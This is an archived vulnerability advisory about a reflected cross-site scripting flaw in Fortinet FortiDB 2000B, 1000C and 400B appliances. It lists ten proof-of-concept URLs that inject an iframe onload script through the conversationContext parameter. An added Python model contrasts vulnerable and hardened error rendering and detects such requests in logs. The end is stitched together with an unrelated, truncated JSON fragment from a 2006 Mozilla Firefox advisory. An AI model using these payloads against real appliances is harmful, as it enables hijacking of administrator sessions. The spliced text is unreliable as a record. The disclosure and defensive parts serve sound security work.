FortiGate FortiDB 2kB 1kC / 400B Cross Site Scripting
2012-10-31T00:00:00
ID 1337DAY-ID-19873 Type zdt Reporter n/a Modified 2012-10-31T00:00:00
Description
FortiGate FortiDB 2kB 1kC and 400B suffer from a cross site scripting vulnerability.
FortiGate FortiDB 2kB 1kC & 400B - Cross Site Scripting Vulnerability
Introduction:
=============
Targeting large enterprises, the FortiDB-2000B appliance provides a scalable database security and
compliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and
easy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA),
IT audit, and regulatory compliance.
Designed for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database
security and compliance solution. Through its web-based interface, the FortiDB-1000C centrally
monitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent
database security policies across the organization without imposing high management burdens on your
database admin and IT staff.
The FortiDB-400B appliance provides a cost-effective database security and compliance solution for
small to mid-size enterprises in a quick-to-implement, easy-to-manage package. It scans databases
for vulnerabilities, monitors and audits database activities, and generates compliance reports.
Its intuitive web-based interface ensures ease of configuration, minimizing the management burden
on your database administrators and IT staff.
(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )
Cross Site Scripting Vulnerability in FortiGate's FortiDB 2kB 1kC & 400B.
Affected Products:
==================
Fortigate
Product: FortiDB - Database Security Appliance v2000B; 1000C & 400B
Details:
========
A non-persistent (reflected) input validation vulnerability has been detected in FortiGate's FortiDB appliances 2000B, 1000C & 400B.
The vulnerability allows remote attackers to inject malicious script code that the application reflects in its own output.
The vulnerability is located in the Java number format exception handling module, in the exception output listing bound to it.
The bug is on the application side and the execution is non-persistent, within the context of the appliance's exception-handling
web application. Exploitation requires low or medium user interaction. Successful exploitation of the vulnerability can
lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Vulnerable Module(s):
[+] Java Number Format Exception Handling
Affected Function(s):
[+] (Output) Listing
Proof of Concept:
=================
The vulnerability can be exploited by a remote attacker with medium or high required user interaction. For demonstration or reproduction ...
Review: Java Number Format Exception-Handling - Listing [Output] Error
<pre class="errorExceptionCause">java.lang.NumberFormatException:
For input string: ""><[NON PERSISTENT SCRIPT CODE!]")' <"
    at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
    at java.lang.Long.parseLong(Long.java:410)
    at org.apache.myfaces.orchestra.conversation.ConversationManager.findConversationContextId(ConversationManager.java:157)
    at org.apache.myfaces.orchestra.conversation.ConversationManager.getCurrentRootConversationContext(ConversationManager.java:564)
    at org.apache.myfaces.orchestra.lib.jsf.ContextLockRequestHandler.init(ContextLockRequestHandler.java:87)
    at org.apache.myfaces.orchestra.lib.jsf.OrchestraFacesContextFactory$1.<init>(OrchestraFacesContextFactory.java:119)
    at ...
PoC:
http://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
Solution:
=========
The vulnerability can be prevented by sanitising (encoding) the Java number format exception output listing and validating the mkey application value before either is echoed to the client.
2012-10-24: Vendor Fix/Patch
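The Python model below is an added example, not FortiDB or Apache MyFaces Orchestra code. It reproduces the mechanism from the Details section (the NumberFormatException message repeats the unparsed conversationContext value verbatim and is written into the error listing) beside the hardened rendering the Solution section calls for, and adds a check over access-log lines for requests that can only end in that listing; the parse_long mimic, the function names and the log lines are assumptions constructed for the example.

```python
"""Model of the FortiDB conversationContext error-listing XSS: vulnerable
rendering beside a hardened one, plus a log check. Added example; none of
this is FortiDB or Apache MyFaces Orchestra code."""
import html
import re
from urllib.parse import parse_qs, urlsplit

LONG_MIN, LONG_MAX = -(1 << 63), (1 << 63) - 1
# A conversation context id is a plain non-negative integer; anything else is rejected.
CONTEXT_ID = re.compile(r"\d{1,19}")


def parse_long(s: str) -> int:
    """Mimic of java.lang.Long.parseLong (assumption): the failure message repeats
    the input verbatim, which is exactly what the advisory's exception listing shows."""
    if not re.fullmatch(r"[+-]?\d+", s):
        raise ValueError(f'For input string: "{s}"')
    value = int(s)
    if not LONG_MIN <= value <= LONG_MAX:
        raise ValueError(f'For input string: "{s}"')
    return value


def conversation_context_from_url(url: str) -> str:
    """Decoded conversationContext query value as the .jsf page receives it ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("conversationContext", [""])[0]


def render_error_vulnerable(raw_value: str) -> str:
    """Vulnerable pattern: the exception message, carrying the attacker-controlled
    parameter, is written into the error page without encoding."""
    try:
        parse_long(raw_value)
    except ValueError as exc:
        return f'<pre class="errorExceptionCause">{exc}</pre>'
    return "<!-- ok -->"


def render_error_hardened(raw_value: str) -> str:
    """Hardened pattern: validate the id before parsing so no exception can carry
    attacker text, and HTML-escape whatever does reach the page (defence in depth)."""
    if not CONTEXT_ID.fullmatch(raw_value):
        # Generic message only; the rejected value belongs in a server-side log, not the response.
        return '<pre class="errorExceptionCause">Invalid conversation context</pre>'
    try:
        parse_long(raw_value)  # can still fail on out-of-range values
    except ValueError as exc:
        return f'<pre class="errorExceptionCause">{html.escape(str(exc))}</pre>'
    return "<!-- ok -->"


def suspicious_context_requests(log_lines):
    """Detection: .jsf requests whose conversationContext is not a plain integer,
    i.e. requests that can only end in the exception listing. Returns (path, value) pairs."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        if not path.endswith(".jsf"):
            continue
        ctx = parse_qs(query, keep_blank_values=True).get("conversationContext")
        if ctx is not None and not CONTEXT_ID.fullmatch(ctx[0]):
            hits.append((path, ctx[0]))
    return hits


# Constructed sample data: the first PoC URL from the advisory, and three made-up
# access-log lines in combined format (hosts, timestamps and sizes are invented).
SAMPLE_URL = ("http://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf"
              "?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C")
LOG_LINES = [
    '10.0.0.5 - admin [24/Oct/2012:10:00:01 +0000] "GET /fortidb/admin/auditTrail.jsf'
    '?conversationContext=17 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [24/Oct/2012:10:00:07 +0000] "GET /fortidb/vascan/list.jsf'
    '?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C HTTP/1.1" 500 2210',
    '10.0.0.9 - - [24/Oct/2012:10:00:09 +0000] "GET /fortidb/sysconfig/listSystemInfo.jsf HTTP/1.1" 200 4011',
]

if __name__ == "__main__":
    raw = conversation_context_from_url(SAMPLE_URL)
    print("vulnerable:", render_error_vulnerable(raw))
    print("hardened:  ", render_error_hardened(raw))
    for path, value in suspicious_context_requests(LOG_LINES):
        print("suspicious:", path, repr(value))
```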
Risk:
=====
The security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).
# 0day.today [2018-01-10] #
Eiram, Secunia Research.\r\n4) Thor Larholm\r\n5) H. D. Moore\r\n6) Igor Bukanov, shutdown, and Georgi Guninski.\r\n7) moz_bug_r_a4\r\n8) moz_bug_r_a4\r\n9) shutdown\r\n10) shutdown\r\n11) Mozilla Developers\r\n12) Benjamin Smedberg, Mozilla.\r\n\r\nORIGINAL ADVISORY:\r\nMozilla.org:\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-44.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-46.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-47.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-48.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-50.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-51.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-52.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-53.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-54.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-55.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-56.html\r\n\r\nSecunia Research:\r\nhttp://secunia.com/secunia_research/2006-53/\r\n\r\nZDI:\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-025.html\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.", "modified": "2006-07-27T00:00:00", "published": "2006-07-27T00:00:00", "id": 
"SECURITYVULNS:DOC:13642", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13642", "title": "[SA19873] Mozilla Firefox Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}